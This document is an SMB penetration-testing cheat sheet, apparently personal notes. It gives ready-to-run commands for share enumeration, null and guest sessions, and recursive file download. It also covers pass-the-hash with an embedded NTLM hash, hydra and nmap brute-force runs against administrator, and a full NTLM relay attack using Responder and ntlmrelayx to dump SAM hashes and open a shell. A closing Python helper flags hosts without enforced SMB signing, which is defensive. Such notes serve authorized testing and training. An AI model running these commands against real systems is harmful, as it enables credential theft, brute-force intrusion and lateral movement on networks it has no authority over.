# SMB

List of SMB versions and corresponding Windows versions:

1. SMB1 – Windows 2000, XP and Windows 2003
2. SMB2 – Windows Vista SP1 and Windows 2008
3. SMB2.1 – Windows 7 and Windows 2008 R2
4. SMB3 – Windows 8 and Windows 2012

#### ENUM4LINUX

```
enum4linux -a $ip                          # run all enumeration
enum4linux -u user_name -p password $ip    # enumerate with a user account
enum4linux -U $ip                          # list usernames
enum4linux -S $ip                          # list shares
enum4linux -o $ip                          # get OS information
```

#### NMAP/SMBCLIENT/SMBMAP

```
# Enumerate OS, computer name, domain, workgroup and current time over the SMB protocol
nmap -v -p 139,445 --script smb-os-discovery $ip

# List shares
nmap --script smb-enum-shares -p 139,445 $ip
smbclient -L //$ip
smbclient -L //$ip --option='client min protocol=NT1'   # if NT_STATUS_CONNECTION_DISCONNECTED (SMB1-only host)
smbmap -H $ip

# List files
smbclient //$ip/PATH -c 'recurse;ls'
net view \\dc01 /all                                    # from a Windows host
smbmap -H $ip -R $sharename

# Connect to a share
smbclient -U '%' -L //$ip                               # null session
smbclient -U 'guest%' -L //$ip                          # guest account, empty password
smbclient \\\\192.168.1.101\\C$
smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'
smbclient \\\\192.168.1.101\\admin$ -U username
```

#### DOWNLOAD FILES

```
# Inside an smbclient session: download everything recursively
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

# With smbmap: download a single file in quiet mode
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q

# Authenticate with an LM:NT hash and download everything recursively from the wwwroot share
# to /usr/share/smbmap. Great when smbclient doesn't work
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
```

#### MOUNT SHARES LOCALLY

```
sudo mount -t cifs -o 'user=guest' //$ip/share /mnt/share
sudo mount -t cifs -o 'username=user,password=password' //$ip/sharename /mnt
ls /mnt/share -laR    # recursive listing of all directories
```

#### BRUTE FORCE SHARE

```
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv
```

### SMB Relay - AD

Relay a captured NTLM authentication to another machine to gain access there.

Requirements: the relayed user must be an admin on the target, and SMB signing must be disabled (not required) on the target.

```
# 1. Check for SMB hosts with signing disabled
nmap --script=smb2-security-mode.nse -p445 $net --open

# 2. Turn off Responder's HTTP and SMB servers so it only listens and answers the fake
#    requests; the authentication is relayed to another machine by ntlmrelayx instead
sudo vim /etc/responder/Responder.conf

# 3. Run Responder
sudo responder -A -I eth0 -v

# 4. Run ntlmrelayx to take the authentication from Responder and relay it to the targets
impacket-ntlmrelayx -tf targets.txt -smb2support

# 5. Get the local SAM hashes
#    For an SMB shell instead (put files, change passwords, use shares, etc.), add -i
#    and connect to the local listener
impacket-ntlmrelayx -tf targets.txt -smb2support -i
nc 127.0.0.1 11000
```
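The signing check in step 1 doubles as a remediation list for defenders. As an added example that is not part of the original notes, this Python helper parses nmap's normal output for smb2-security-mode (the sample output below is constructed, and the line layout is assumed from nmap's usual formatting) and returns the hosts where signing is not required, i.e. the hosts to fix by enforcing SMB signing.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap --script=smb2-security-mode -p445` normal output,
# trimmed to the lines the parser cares about (not from a real scan).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (10.0.0.10)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.7
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
"""

# "Nmap scan report for 10.0.0.5" or "Nmap scan report for name (10.0.0.10)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
# Script verdict line, e.g. "|_    Message signing enabled but not required"
SIGNING_RE = re.compile(r"^\|_?\s+Message signing (.+)$")

def parse_signing(output: str) -> Dict[str, str]:
    """Map each scanned IP to its signing verdict ('unknown' when the script printed none)."""
    results: Dict[str, str] = {}
    current = None
    for line in output.splitlines():
        host = HOST_RE.match(line)
        if host:
            current = host.group(1)
            results[current] = "unknown"
            continue
        verdict = SIGNING_RE.match(line)
        if verdict and current:
            results[current] = verdict.group(1).strip()
    return results

def signing_not_required(output: str) -> List[str]:
    """IPs where SMB2 signing is not enforced: the hosts to fix by requiring signing."""
    return sorted(ip for ip, v in parse_signing(output).items() if "not required" in v)

if __name__ == "__main__":
    print("Hosts where SMB signing is not required:", signing_not_required(SAMPLE_NMAP_OUTPUT))
```

Pipe a real scan in with `nmap ... -oN scan.txt` and pass the file contents to `signing_not_required`.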
